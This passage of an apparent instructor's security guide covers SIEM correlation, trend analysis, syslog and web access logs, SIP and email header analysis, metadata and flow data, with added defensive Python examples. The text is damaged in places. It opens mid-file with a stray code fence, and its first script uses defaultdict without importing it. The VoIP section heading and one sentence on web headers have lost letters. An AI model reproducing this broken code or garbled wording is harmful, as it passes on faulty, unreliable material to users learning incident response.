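from datetime import datetime, timedelta

# Constructed events in normalized form (what a SIEM produces after parsing
# raw logs into standard field types). Times are ISO 8601, same time zone.
SAMPLE_EVENTS = [
    {"time": "2021-08-30T09:00:05", "event": "LogonFailure", "user": "alice"},
    {"time": "2021-08-30T09:02:10", "event": "LogonFailure", "user": "alice"},
    {"time": "2021-08-30T09:03:44", "event": "LogonSuccess", "user": "alice"},
    {"time": "2021-08-30T10:15:00", "event": "LogonFailure", "user": "svc_backup"},
    {"time": "2021-08-30T10:16:00", "event": "LogonFailure", "user": "svc_backup"},
    {"time": "2021-08-30T10:17:00", "event": "LogonFailure", "user": "svc_backup"},
    {"time": "2021-08-30T10:18:30", "event": "LogonFailure", "user": "svc_backup"},
    # bob also fails four times, but spread over two hours: not a match
    {"time": "2021-08-30T13:00:00", "event": "LogonFailure", "user": "bob"},
    {"time": "2021-08-30T13:30:00", "event": "LogonFailure", "user": "bob"},
    {"time": "2021-08-30T14:30:00", "event": "LogonFailure", "user": "bob"},
    {"time": "2021-08-30T15:00:00", "event": "LogonFailure", "user": "bob"},
]


def correlate_logon_failures(events, threshold=3, window=timedelta(hours=1)):
    """Return one alert per user whose LogonFailure count inside any span
    shorter than `window` exceeds `threshold` (count > threshold, as in the
    rule). Events need not arrive in order; they are sorted per user."""
    failures = defaultdict(list)
    for ev in events:
        if ev["event"] == "LogonFailure":
            failures[ev["user"]].append(datetime.fromisoformat(ev["time"]))

    alerts = []
    for user, times in failures.items():
        times.sort()
        start = 0
        for end, t_end in enumerate(times):
            # Advance the window start until the span [start, end] is < window.
            while t_end - times[start] >= window:
                start += 1
            count = end - start + 1
            if count > threshold:
                alerts.append({
                    "user": user,
                    "count": count,
                    "first": times[start].isoformat(),
                    "last": t_end.isoformat(),
                })
                break  # one alert per user is enough for the handler
    return alerts


if __name__ == "__main__":
    for alert in correlate_logon_failures(SAMPLE_EVENTS):
        print(alert)
```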
As well as correlation between indicators observed on the network, a SIEM is likely to
be configured with a threat intelligence feed. This means that data points observed on
the network can be associated with known threat actor indicators, such as IP addresses
and domain names. AI-assisted analysis enables more sophisticated alerting and
detection of anomalous behavior.

Retention
A SIEM can enact a retention policy so that historical log and network traffic data is kept for a defined period. This allows for retrospective incident and threat hunting, and can be a valuable source of forensic evidence.

SIEM Dashboards
Show Slide(s): SIEM Dashboards

SIEM dashboards are one of the main sources of automated alerts. A SIEM dashboard provides a console to work from for day-to-day incident response. Separate dashboards can be created to suit many different purposes. An incident handler's dashboard will contain uncategorized events that have been assigned to their account, plus visualizations (graphs and tables) showing key status metrics. A manager's dashboard would show overall status indicators, such as number of unclassified events for all event handlers.


The SGUIL console in Security Onion. A SIEM can generate huge numbers of alerts that need to be manually assessed for priority and investigation. (Screenshot courtesy of Security Onion securityonion.net.)

Sensitivity and Alerts

One of the greatest challenges in operating a SIEM is tuning the system sensitivity to reduce false positive indicators being reported as an event. This is difficult firstly because there isn't a simple dial to turn for overall sensitivity, and secondly because reducing the number of rules that produce events increases the risk of false negatives. A false negative is where indicators that should be correlated as an event and raise an alert are ignored.

The correlation rules are likely to assign a criticality level to each match. For example:
• Log only—an event is produced and added to the SIEM's database, but it is automatically classified.

• Alert—the event is listed on a dashboard or incident handling system for an agent to assess. The agent classifies the event and either dismisses it to the log or escalates it as an incident.

• Alarm—the event is automatically classified as critical and a priority alarm is raised. This might mean emailing an incident handler or sending a text message.

Sensors
A sensor is a network tap or port mirror that performs packet capture and intrusion
detection. One of the key uses of a SIEM is to aggregate data from multiple sensors and
log sources, but it might also be appropriate to configure dashboards that show output
from a single sensor or source host.


Trend Analysis
Show Slide(s): Trend Analysis

Trend analysis is the process of detecting patterns or indicators within a data set over a time series and using those patterns to make predictions about future events. A trend is difficult to spot by examining each event in a log file. Instead, you need software to visualize the incidence of types of event and show how the number or frequency of those events changes over time. Trend analysis can apply to frequency, volume, or statistical deviation:
• Frequency-based trend analysis establishes a baseline for a metric, such as number of NXDOMAIN log events per hour of the day. If the frequency exceeds (or in some cases undershoots) the threshold for the baseline, then an alert is raised.

• Volume-based trend analysis can be performed with simpler indicators. For example, one simple metric for determining threat level is log volume. If logs are growing much faster than they were previously, there is a good chance that something needs investigating. Volume-based analysis also applies to network traffic. You might also measure endpoint disk usage. Client workstations don't usually need to store data locally, so if a host's disk capacity has suddenly diminished, it could be a sign that it is being used to stage data for exfiltration.

• Statistical deviation analysis can show when a data point should be treated as suspicious. For example, a cluster graph might show activity by standard users and privileged users, invoking analysis of behavioral metrics of what processes each type runs, which systems they access, and so on. A data point that appears outside the two clusters for standard and administrative users might indicate some suspicious activity by that account.
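Frequency-based trend analysis with a statistical-deviation threshold, combining the first and third points above, as an added example rather than code from the guide: the hourly NXDOMAIN counts are constructed, and the hour-of-day baseline, the 3-standard-deviation band and the floor on the deviation are assumptions chosen for illustration.

```python
"""Frequency-based trend analysis with a statistical-deviation threshold:
an hour-of-day baseline for NXDOMAIN counts and a check that flags hours that
exceed or undershoot it. Added example; all counts are constructed."""
from statistics import mean, pstdev

# Constructed baseline: five weekdays of NXDOMAIN responses per hour (24 values
# each). Daytime hours are busy, night hours are nearly idle.
BASELINE_DAYS = [
    [3, 2, 2, 1, 1, 2, 5, 12, 30, 42, 45, 44, 40, 43, 46, 44, 38, 25, 12, 8, 6, 5, 4, 3],
    [2, 3, 1, 2, 1, 3, 6, 14, 32, 40, 47, 43, 41, 45, 44, 46, 36, 24, 11, 9, 5, 4, 3, 2],
    [3, 2, 2, 2, 2, 2, 4, 13, 29, 41, 44, 45, 42, 44, 45, 43, 37, 26, 13, 7, 6, 4, 4, 3],
    [2, 2, 1, 1, 2, 3, 5, 11, 31, 43, 46, 42, 39, 42, 47, 45, 39, 23, 12, 8, 5, 5, 3, 2],
    [3, 3, 2, 1, 1, 2, 5, 12, 30, 40, 45, 44, 40, 44, 46, 44, 38, 25, 12, 8, 6, 5, 4, 3],
]
# Constructed day under review: a burst of failures at 03:00 and none at all
# at 14:00 (the undershoot is just as worth a look: has logging stopped?).
TODAY = [3, 2, 2, 40, 1, 2, 5, 12, 30, 42, 45, 44, 40, 43, 0, 44, 38, 25, 12, 8, 6, 5, 4, 3]


def build_baseline(days):
    """(mean, population std dev) of the metric for each hour of the day."""
    return [(mean(samples), pstdev(samples)) for samples in zip(*days)]


def detect_deviations(today, baseline, k=3.0, min_sd=1.0):
    """Flag hours more than k standard deviations above or below the baseline
    mean. min_sd keeps near-constant quiet hours from alerting on a change
    of one or two events, which a raw z-score would do."""
    findings = []
    for hour, count in enumerate(today):
        mu, sd = baseline[hour]
        band = k * max(sd, min_sd)
        if count > mu + band:
            findings.append((hour, count, "above"))
        elif count < mu - band:
            findings.append((hour, count, "below"))
    return findings


if __name__ == "__main__":
    for hour, count, direction in detect_deviations(TODAY, build_baseline(BASELINE_DAYS)):
        print(f"{hour:02d}:00 NXDOMAIN count {count} is {direction} baseline")
```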

Logging Platforms
Show Slide(s): Logging Platforms
Teaching Tip: Focus on syslog, but also make sure students recognize the difference in the alternative platforms.

Log data from network appliances and hosts can be aggregated by a SIEM either by installing a local agent to collect and parse the log data or by using a forwarding system to transmit logs directly to the SIEM server. Also, organizations may not operate a SIEM, but still use a logging platform to aggregate log data in a central location.

Syslog (tools.ietf.org/html/rfc3164) provides an open format, protocol, and server software for logging event messages. It is used by a very wide range of host types. For example, syslog messages can be generated by Cisco routers and switches, as well as servers and workstations. It usually uses UDP port 514.

A syslog message comprises a PRI code, a header containing a timestamp and host name, and a message part. The PRI code is calculated from the facility and a severity level. The message part contains a tag showing the source process plus content. The format of the content is application dependent. It might use space- or comma-delimited fields or name/value pairs, such as JSON data.

RFC 5424 (tools.ietf.org/html/rfc5424) adjusts the structure slightly to split the tag into app name, process ID, and message ID fields, and to make them part of the header.
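Decoding the PRI code and splitting the RFC 3164 and RFC 5424 headers described above, as an added example that is not from the guide or from any syslog implementation: the two messages are constructed, and the patterns cover the well-formed layouts given in the RFCs rather than every variant real devices emit.

```python
"""Decode the syslog PRI code and split the header in both the RFC 3164 and
RFC 5424 layouts described above. Added example; the two messages below are
constructed and the patterns cover the well-formed layouts from the RFCs,
not every variant real devices emit."""
import re

# Facility codes 0-23 (RFC 3164 section 4.1.1) and severity codes 0-7.
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "audit", "alert", "clock",
              "local0", "local1", "local2", "local3", "local4", "local5",
              "local6", "local7"]
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]

# RFC 3164: <PRI>TIMESTAMP HOSTNAME TAG[PID]: CONTENT
RFC3164 = re.compile(
    r"^<(?P<pri>\d{1,3})>"
    r"(?P<timestamp>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) "
    r"(?P<hostname>\S+) (?P<tag>[^\s:\[]+)(?:\[(?P<pid>\d+)\])?: ?(?P<msg>.*)$")
# RFC 5424: <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID SD MSG
# (structured data is "-" or one or more [..] elements; "]" inside a value
# must be escaped per the RFC, which this simple pattern does not handle)
RFC5424 = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<version>\d) (?P<timestamp>\S+) (?P<hostname>\S+) "
    r"(?P<app>\S+) (?P<procid>\S+) (?P<msgid>\S+) (?P<sd>-|(?:\[[^\]]*\])+) ?(?P<msg>.*)$")


def decode_pri(pri):
    """PRI = facility * 8 + severity; returns the two names."""
    facility, severity = divmod(int(pri), 8)
    if not 0 <= facility < len(FACILITIES):
        raise ValueError(f"PRI {pri} is outside the defined facility range")
    return FACILITIES[facility], SEVERITIES[severity]


def parse_syslog(line):
    """Return a dict of header fields plus facility/severity names and which
    of the two layouts matched."""
    m = RFC5424.match(line) or RFC3164.match(line)
    if m is None:
        raise ValueError("not a recognised syslog message: " + line)
    fields = m.groupdict()
    fields["facility"], fields["severity"] = decode_pri(fields.pop("pri"))
    fields["format"] = "rfc5424" if "version" in fields else "rfc3164"
    return fields


# Constructed messages: <34> is auth.crit, <165> is local4.notice.
SAMPLE_3164 = ("<34>Aug 30 14:05:07 fw01 sshd[2187]: Failed password for "
               "alice from 203.0.113.9 port 51234 ssh2")
SAMPLE_5424 = ('<165>1 2021-08-30T14:05:07.123Z web01 nginx 1312 ID47 '
               '[exampleSDID@32473 iut="3"] client 198.51.100.7 blocked')

if __name__ == "__main__":
    for sample in (SAMPLE_3164, SAMPLE_5424):
        print(parse_syslog(sample))
```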

Rsyslog and Syslog-ng

There have been two updates to the original syslog specification:
• Rsyslog uses the same configuration file syntax, but can work over TCP and use a secure connection. Rsyslog can use more types of filter expressions in its configuration file to customize message handling.

• Syslog-ng uses a different configuration file syntax, but can also use TCP/secure communications and more advanced options for message filtering.

journalctl
In Linux, text-based log files of the sort managed by syslog can be viewed using commands such as cat, tail, and head. Most modern Linux distributions now use systemd to initialize the system and to start and manage background services. Rather than writing events to syslog-format text files, logs from processes managed by systemd are written to a binary-format file called journald. Events captured by journald can be forwarded to syslog. To view events in journald directly, you can use the journalctl command to print the entire journal log, or you can issue various options with the command to filter the log in a variety of ways, such as matching a service name or only printing messages matching the specified severity level.

NXlog
NXlog (nxlog.co) is an open-source log normalization tool. One principal use for it is to collect Windows logs, which use an XML-based format, and normalize them to a syslog format.

Network, OS, and Security Log Files
Show Slide(s): Network, OS, and Security Log Files

Log file data is a critical resource for investigating security incidents. As well as the log format, you must also consider the range of sources for log files and know how to determine what type of log file will best support any given investigation scenario.

System and Security Logs
Teaching Tip: Emphasize that relying on the default logging options is unlikely to be sufficient. Audit logs in particular require careful tuning to provide an effective audit trail and enforce accountability and non-repudiation. We do mention it elsewhere, but you may want to remind students that sysmon is very widely used for Windows security logging (github.com/SwiftOnSecurity/sysmon-config).

One source of security information is the event log from each network server or client. Systems such as Microsoft Windows, Apple macOS, and Linux keep a variety of logs to record events as users and software interact with the system. The format of the logs varies depending on the system. Information contained within the logs also varies by system, and in many cases, the type of information that is captured can be configured.

When events are generated, they are placed into log categories. These categories describe the general nature of the events or what areas of the OS they affect. The five main categories of Windows event logs are:
• Application—events generated by applications and services, such as when a service cannot start.
• Security—audit events, such as a failed logon or access to a file being denied.
• System—events generated by the operating system and its services, such as storage volume health checks.
• Setup—events generated during the installation of Windows.
• Forwarded Events—events that are sent to the local log from other hosts.

Network Logs
Network logs are generated by appliances such as routers, firewalls, switches, and access points. Log files will record the operation and status of the appliance itself (the system log for the appliance) plus traffic and access logs recording network behavior, such as a host trying to use a port that is blocked by the firewall, or an endpoint trying to use multiple MAC addresses when connected to a switch.


Authentication Logs
Authentication attempts for each host are likely to be written to the security log. You might also need to inspect logs from the servers authorizing logons, such as RADIUS and TACACS+ servers or Windows Active Directory (AD) servers.

Vulnerability Scan Output

A vulnerability scan report is another important source when determining how an attack might have been made. The scan engine might log or alert when a scan report contains vulnerabilities. The report can be analyzed to identify vulnerabilities that have not been patched or configuration weaknesses that have not been remediated. These can be correlated to recently developed exploits.

Application Log Files
Show Slide(s): Application Log Files
Teaching Tip: You don't need to go through these in detail in class. Just make sure students know what type of information can be retrieved from each type of data source.

An application log file is simply one that is managed by the application rather than the OS. The application may use Event Viewer or syslog to write event data using a standard format, or it might write log files to its own application directories in whatever format the developer has selected.

DNS Event Logs
A DNS server may log an event each time it handles a request to convert between a domain name and an IP address. DNS event logs can hold a variety of information that may supply useful security intelligence, such as:
• The types of queries a host has made to DNS.
• Hosts that are in communication with suspicious IP address ranges or domains.
• Statistical anomalies such as spikes or consistently large numbers of DNS lookup failures, which may point to computers that are infected with malware, misconfigured, or running obsolete or faulty applications.

Web/HTTP Access Logs
Web servers are typically configured to log HTTP traffic that encounters an error or traffic that matches some predefined rule set. Most web servers use the common log format (CLF) or W3C extended log file format to record the relevant information.

The status code of a response can reveal quite a bit about both the request and the server's behavior. Codes in the 400 range indicate client-based errors, while codes in the 500 range indicate server-based errors. For example, repeated 403 Forbidden responses may indicate that the server is rejecting a client's attempts to access resources they are not authorized to. A 502 Bad Gateway response could indicate that communications between the target server and its upstream server are being blocked, or that the upstream server is down.

In addition to status codes, some web server software also logs HTTP header information for both requests and responses. This can provide you with a better picture of the makeup of each request or response, such as cookie information and MIME types. Another header field of note is the User-Agent field, which identifies the type of application making the request. In most cases, this is the version of the browser that the client is using to access a site, as well as the client's operating system. However, this can be misleading, as even a browser like Microsoft Edge includes versions of Google Chrome and Safari in its User-Agent string. Therefore, the User-Agent field may not be a reliable indicator of the client's environment.
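Parsing common log format lines and pulling out the two conditions described above (a client receiving repeated 403 Forbidden responses, and any 5xx server-side error such as 502 Bad Gateway), as an added example that is not part of the guide: the log lines are constructed, the client addresses come from documentation ranges, and the threshold of three is an assumption.

```python
"""Parse common log format (CLF) access-log lines and pull out the two
conditions the text calls out: clients with repeated 403 Forbidden responses
and any 5xx server-side errors. Added example; the log lines are constructed
and the client addresses come from documentation ranges."""
import re
from collections import Counter, defaultdict

# CLF: host ident authuser [date] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$')

# Constructed access log: one client repeatedly refused, one 502 from a
# back-end, one ordinary request and one line that is not CLF at all.
SAMPLE_LOG = """\
203.0.113.9 - - [30/Aug/2021:14:05:07 +0000] "GET /private/ HTTP/1.1" 403 199
203.0.113.9 - - [30/Aug/2021:14:05:08 +0000] "GET /private/config HTTP/1.1" 403 199
203.0.113.9 - - [30/Aug/2021:14:05:09 +0000] "GET /private/users HTTP/1.1" 403 199
203.0.113.9 - - [30/Aug/2021:14:05:10 +0000] "GET /private/backup HTTP/1.1" 403 199
198.51.100.7 - alice [30/Aug/2021:14:06:00 +0000] "GET /reports/ HTTP/1.1" 200 5120
198.51.100.7 - alice [30/Aug/2021:14:06:30 +0000] "POST /reports/export HTTP/1.1" 502 -
192.0.2.44 - - [30/Aug/2021:14:07:12 +0000] "GET /index.html HTTP/1.1" 200 1043
garbage line that is not CLF and must be reported rather than silently dropped
"""


def parse_clf(text):
    """Split log text into parsed records and the lines that did not match;
    unparseable lines are kept visible rather than discarded."""
    records, unparsed = [], []
    for line in text.splitlines():
        m = CLF.match(line)
        if m:
            records.append(m.groupdict())
        else:
            unparsed.append(line)
    return records, unparsed


def status_by_client(records):
    """Map client host -> Counter of the status codes it received."""
    per_client = defaultdict(Counter)
    for r in records:
        per_client[r["host"]][r["status"]] += 1
    return per_client


def repeated_forbidden(records, threshold=3):
    """Clients that received more than `threshold` 403 responses."""
    return sorted(host for host, codes in status_by_client(records).items()
                  if codes["403"] > threshold)


def server_errors(records):
    """(host, path, status) for every 5xx response: the upstream/back-end
    problems the text describes, e.g. 502 Bad Gateway."""
    return [(r["host"], r["path"], r["status"])
            for r in records if r["status"].startswith("5")]


if __name__ == "__main__":
    recs, bad = parse_clf(SAMPLE_LOG)
    print("repeated 403:", repeated_forbidden(recs))
    print("5xx:", server_errors(recs))
    print("unparsed:", bad)
```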


oI and Call ana ers and ession Initiation rotocol I Tra c


Many VoIP systems use the Session Initiation Protocol (SIP) to identify endpoints and
set up calls. The call content is transferred using a separate protocol, typically the Real-
time Transport Protocol (RTP). VoIP protocols are vulnerable to most of the same
vulnerabilities and exploits as web communications. Both SIP and RTP should use their
secure forms: SIPS, where endpoints are authenticated and signaling is protected by
Transport Layer Security (TLS), and Secure RTP (SRTP), which encrypts and authenticates
the media stream.
The call manager is a gateway that connects endpoints within the local network and
over the Internet. The call manager is also likely to implement a media gateway to
connect VoIP calls to cellphone and landline telephone networks. SIP produces similar
logs to SMTP, typically in the common log format. A SIP log will identify the endpoints
involved in a call request, plus the type of connection (voice only or voice with video,
for instance), and status messaging. When handling requests, the call manager and
any other intermediate servers add their IP address in a Via header, similar to per-
hop SMTP Received headers. Inspecting the logs might reveal evidence of a man-in-the-
middle attack where an unauthorized proxy is intercepting traffic: a Via hop that is not
one of your own proxies, or a hop using plain UDP or TCP where TLS is mandated. VoIP
systems connected to telephone networks are also targets for toll fraud. The call
manager's access log can be audited for suspicious connections.
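As an added example (not code from the guide), this Python reads the Via headers of a SIP INVITE as the call manager would see it and audits the path: every intermediary must be one of the organization's own proxies, every hop must use TLS, and a hop's claimed sent-by address must agree with the `received` parameter that the receiving server appends when the packet actually came from somewhere else (RFC 3261 behavior). The two INVITE messages and the `KNOWN_PROXIES` set are constructed for illustration.

```python
"""Audit the Via path of a SIP request for rogue or downgraded hops.

Added example, not from the guide. The SIP messages below are constructed; the
KNOWN_PROXIES set stands in for the organization's own SIP proxies.
"""
import re

KNOWN_PROXIES = {"10.1.1.20", "10.1.1.21"}   # assumed: our SIP proxies

# Via: SIP/2.0/<transport> <host>[:port][;param[=value]]...
VIA_RE = re.compile(
    r"^SIP/2\.0/(?P<transport>[A-Z]+)\s+"
    r"(?P<host>\[[^\]]+\]|[^;:\s]+)(?::(?P<port>\d+))?"
    r"(?P<params>(?:;[^;]+)*)$"
)


def _invite(top_via):
    """Build an INVITE as it arrives at the call manager. The bottom Via is the
    originating phone; each intermediary stacks its own Via on top of it."""
    return "\r\n".join([
        "INVITE sip:bob@example.com SIP/2.0",
        top_via,
        "Via: SIP/2.0/TLS 10.1.1.5:5061;branch=z9hG4bK77ef4c",
        "From: Alice <sip:alice@example.com>;tag=1928301774",
        "To: Bob <sip:bob@example.com>",
        "Call-ID: a84b4c76e66710@10.1.1.5",
        "CSeq: 314159 INVITE",
        "Content-Length: 0",
        "", "",
    ])


CLEAN_INVITE = _invite("Via: SIP/2.0/TLS 10.1.1.20:5061;branch=z9hG4bK776asdhds")
# Sent-by claims our proxy, but the packet arrived over UDP from an address that is
# not the proxy at all; the receiving server recorded the real source in 'received'.
SUSPECT_INVITE = _invite(
    "Via: SIP/2.0/UDP 10.1.1.20:5060;branch=z9hG4bK776asdhds;received=192.0.2.99")


def headers(message):
    head = message.split("\r\n\r\n", 1)[0]
    out = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if value:
            out.append((name.strip().lower(), value.strip()))
    return out


def via_hops(message):
    """Hops in path order: originating endpoint first, nearest intermediary last.
    SIP stacks insert each new Via at the top, so the header order is reversed."""
    hops = []
    for name, value in headers(message):
        if name not in ("via", "v"):             # 'v' is the compact form
            continue
        for entry in value.split(","):           # one header may carry several Vias
            m = VIA_RE.match(entry.strip())
            if not m:
                raise ValueError(f"malformed Via: {entry!r}")
            params = dict(p.partition("=")[::2] for p in m["params"].split(";") if p)
            hops.append({"transport": m["transport"], "host": m["host"],
                         "port": m["port"], "received": params.get("received")})
    hops.reverse()
    return hops


def audit_path(message, known_proxies=KNOWN_PROXIES):
    """Return (hops, findings) for one request."""
    hops = via_hops(message)
    findings = []
    for i, hop in enumerate(hops):
        if i > 0 and hop["host"] not in known_proxies:
            findings.append(f"unexpected intermediary {hop['host']}")
        if hop["transport"] != "TLS":
            findings.append(f"{hop['host']} used {hop['transport']} instead of TLS")
        if hop["received"] and hop["received"] != hop["host"]:
            findings.append(f"{hop['host']} claimed in Via but packet came from {hop['received']}")
    return hops, findings
```

`audit_path(SUSPECT_INVITE)` reports both the TLS downgrade and the sent-by/received mismatch; a log entry showing only the claimed address would have looked legitimate.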

Dump Files
System memory contains volatile data. A system memory dump creates an image
file that can be analyzed to identify the processes that are running, the contents of
temporary file systems, registry data, network connections, cryptographic keys, and
more. It can also be a means of accessing data that is encrypted when stored on a
mass storage device.

Metadata

Metadata is the properties of data as it is created by an application, stored on media,
or transmitted over a network. A number of metadata sources are likely to be useful
when investigating incidents, because they can establish timeline questions, such as
when and where, as well as containing other types of evidence.

File
File metadata is stored as attributes. The file system tracks when a file was created,
accessed, and modified. A file might be assigned a security attribute, such as marking
it as read-only or as a hidden or system file. The ACL attached to a file showing its
permissions represents another type of attribute. Finally, the file may have extended
attributes recording an author, copyright information, or tags for indexing/searching. In
Linux, the ls command can be used to report file system metadata (ls -l for permissions,
owner, and modification time; stat for the full set of timestamps).

Web
When a client requests a resource from a web server, the server returns the resource
plus headers setting or describing its properties. Also, the client can include headers
in its request. One key use of headers is to transmit authorization information, in
the form of cookies. eaders describing the type of data returned te t or binary, for
instance) can also be of interest. The contents of headers can be inspected using the
standard tools built into web browsers. Header information may also be logged by a
web server.

Email
An email's Internet header contains address information for the recipient and sender,
plus details of the servers handling transmission of the message between them. When
an email is created, the mail user agent (MUA) creates an initial header and forwards
the message to a mail submission agent (MSA). The MSA should perform checks that the
sender is authorized to issue messages from the domain. Assuming the email isn't
being delivered locally at the same domain, the MSA adds or amends its own header
and then transmits the message to a message transfer agent (MTA). The MTA routes
the message to the recipient, with the message passing via one or more additional
MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA
adds information to the header as a Received field, so the fields read from the most
recent hop at the top to the originating server at the bottom.
Headers aren't exposed to the user by most email applications, which is why they're
usually not a factor in an average user's judgment. You can view and copy headers
from a mail client via a message properties/options/source command. MTAs can add
a lot of information in each Received header, such as the results of spam checking. If
you use a plaintext editor to view the header, it can be difficult to identify where each
part begins and ends. Fortunately, there are plenty of tools available to parse headers
and display them in a more structured format. One example is the Message Analyzer
tool, available as part of the Microsoft Remote Connectivity Analyzer
(testconnectivity.microsoft.com). This will lay out the hops that the message took more
clearly and break out the headers added by each MTA. Bear in mind that only the
Received fields added by your own servers are trustworthy; earlier hops can be forged
by the sender.
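As an added example (not code from the guide), this Python uses the standard library email parser to reconstruct the hop list from the Received fields of a message, reorders them into delivery order, flags a hop whose timestamp runs backwards by more than a clock-skew tolerance, and pulls the SPF verdict out of the Authentication-Results field that the organization's own gateway added. The raw message is constructed; its hosts and addresses are documentation values.

```python
"""Reconstruct the hop-by-hop path of an email from its Received headers.

Added example, not from the guide. RAW_MESSAGE is a constructed message; the
host names and addresses in it are documentation values, not real servers.
"""
import email
import re
from email.utils import parsedate_to_datetime

RAW_MESSAGE = b"""\
Received: from mx2.example.com (mx2.example.com [198.51.100.20])
\tby mail.example.com with ESMTPS id 5bX4; Mon, 30 Aug 2021 10:05:10 +0000
Received: from smtp.partner.example (unknown [203.0.113.9])
\tby mx2.example.com with ESMTP id 9aQ1; Mon, 30 Aug 2021 10:05:05 +0000
Received: from [10.0.0.23] (helo=partner-laptop)
\tby smtp.partner.example with ESMTPSA id 1zK3; Mon, 30 Aug 2021 10:07:30 +0000
Authentication-Results: mx2.example.com; spf=fail smtp.mailfrom=partner.example
From: Accounts <accounts@partner.example>
To: finance@example.com
Subject: Updated bank details
Message-ID: <abc123@partner.example>
Date: Mon, 30 Aug 2021 10:05:00 +0000

Please update our payment details before the next invoice run.
"""

# "from <host> (<comment>) by <host> ... ; <date>"  (the comment is optional)
RECEIVED_RE = re.compile(r"from (?P<from>\S+)(?: \((?P<info>[^)]*)\))? by (?P<by>\S+)")


def received_hops(raw):
    """Parse every Received field. Each MTA prepends its field, so the header is
    read top-down from the final server; reverse it into delivery order."""
    msg = email.message_from_bytes(raw)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())            # unfold: collapse newline + indent
        m = RECEIVED_RE.match(text)
        if not m:
            continue                              # non-standard clause: skip, don't guess
        stamp = text.rsplit(";", 1)[1].strip() if ";" in text else None
        hops.append({"from": m["from"], "info": m["info"], "by": m["by"],
                     "at": parsedate_to_datetime(stamp) if stamp else None})
    hops.reverse()
    return hops


def hop_anomalies(hops, tolerance_s=60):
    """Flag a hop stamped earlier than the previous hop by more than the allowed
    clock skew: a sign of a forged Received field or a badly configured server."""
    findings = []
    for prev, cur in zip(hops, hops[1:]):
        if prev["at"] and cur["at"] and (prev["at"] - cur["at"]).total_seconds() > tolerance_s:
            findings.append(f"{cur['by']} stamped {cur['at'].isoformat()} earlier than {prev['by']}")
    return findings


def spf_result(raw):
    """Return the spf= verdict recorded in Authentication-Results, or None."""
    msg = email.message_from_bytes(raw)
    for value in msg.get_all("Authentication-Results", []):
        m = re.search(r"spf=(\w+)", value)
        if m:
            return m.group(1)
    return None
```

For the constructed message, `received_hops` yields three hops ending at mail.example.com, `hop_anomalies` flags the second hop (its stamp is 145 seconds earlier than the hop before it), and `spf_result` returns "fail".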

Mobile
Mobile phone metadata comprises call detail records (CDRs) of incoming, outgoing,
and attempted calls and SMS texts: time, duration, and the opposite party's number.
Metadata will also record data transfer volumes. The location history of the device
can be tracked by the list of cell towers it has used to connect to the network. If you
are investigating a suspected insider attack, this metadata could prove a suspect's
whereabouts. Furthermore, AI-enabled analysis (or patient investigation) can
correlate the opposite party numbers to businesses and individuals through other
public records.
CDRs are generated and stored by the mobile operator. The retention period for CDRs
is determined by national and state laws, but is typically a matter of months. CDRs are
directly available for corporate-owned devices, where you can request them from the
communications provider as the owner of the device. Metadata for personally owned
devices would only normally be accessible by law enforcement agencies by subpoena
or with the consent of the account holder. An employment contract might require an
employee to give this consent for bring your own device (BYOD) mobiles used within
the workplace.

Metadata such as current location and time is also added to media such as photos and
videos, though this is true for all types of computing device. When these files are uploaded
to social media sites, they can reveal more information than the uploader intended.

Network Data Sources
Network data is typically analyzed in detail at the level of individual frames or using
summary statistics of traffic flows and protocol usage.

Protocol Analyzer Output
A SIEM will store details from sensors at different points on the network. Information
captured from network packets can be aggregated and summarized to show overall
protocol usage and endpoint activity. The contents of packets can also be recorded for
analysis. Recording the full data of every packet, referred to as retrospective network
analysis (RNA), is too costly for most organizations. Typically, packet contents are only
retained when indicators from the traffic are correlated as an event. The SIEM software
will provide the ability to pivot from the event or alert summary to the underlying
packets. Detailed analysis of the packet contents can help to reveal the tools used in an
attack. It is also possible to extract binary files such as potential malware for analysis.

NetFlow/IPFIX
A flow collector is a means of recording metadata and statistics about network traffic
rather than recording each frame. Network traffic and flow data may come from a wide
variety of sources (or probes), such as switches, routers, firewalls, web proxies, and so
forth. Flow analysis tools can provide features such as:
• Highlighting of trends and patterns in traffic generated by particular applications,
hosts, and ports.
• Alerting based on detection of anomalies, flow analysis patterns, or custom triggers.
• Visualization tools that enable you to quickly create a map of network connections
and interpret patterns of traffic and flow data.
• Identification of traffic patterns revealing rogue user behavior, malware in transit,
tunneling, applications exceeding their allocated bandwidth, and so forth.
• Identification of attempts by malware to contact a handler or command & control
(C&C) channel.

NetFlow is a Cisco-developed means of reporting network flow information to a
structured database. NetFlow has been redeveloped as the IP Flow Information
Export (IPFIX) IETF standard (tools.ietf.org/html/rfc7011). A particular traffic flow can
be defined by packets sharing the same characteristics, referred to as keys, such as IP
source and destination addresses and protocol type. A selection of keys is called a flow
label, while traffic matching a flow label is called a flow record. Because a flow record
summarizes traffic rather than capturing it, it shows who talked to whom, when, and
how much, but not what was said.
You can use a variety of NetFlow monitoring tools to capture data for point-in-
time analysis and to diagnose any security or operational issues the network is
experiencing. There are plenty of commercial NetFlow suites, plus products offering
similar functionality to NetFlow. The SiLK suite (tools.netsa.cert.org/silk/) and nfdump/
nfsen (nfsen.sourceforge.net/) are examples of open source implementations. Another
popular tool is Argus (openargus.org). This uses a different data format to NetFlow, but
the client tools can read and translate NetFlow data.

sFlow
sFlow, developed by InMon and published as an informational IETF RFC (tools.ietf.org/
html/rfc3176), uses sampling to measure traffic statistics at any layer of the OSI model
for a wider range of protocol types than the IP-based NetFlow. sFlow can also capture
the entire packet header for samples. Because it samples one packet in N rather than
counting every packet, its byte and packet figures are estimates.

Bandwidth Monitor
Bandwidth usage can be a key indicator of suspicious behavior, if you have reliable
baselines for comparison. Unexpected bandwidth consumption could be evidence
of a data exfiltration attack, for instance. Bandwidth usage can be reported by flow
collectors. Firewalls and web security gateways are also likely to support bandwidth
monitoring and alerting.


Review Activity:
Appropriate Data Sources for
Incident Response
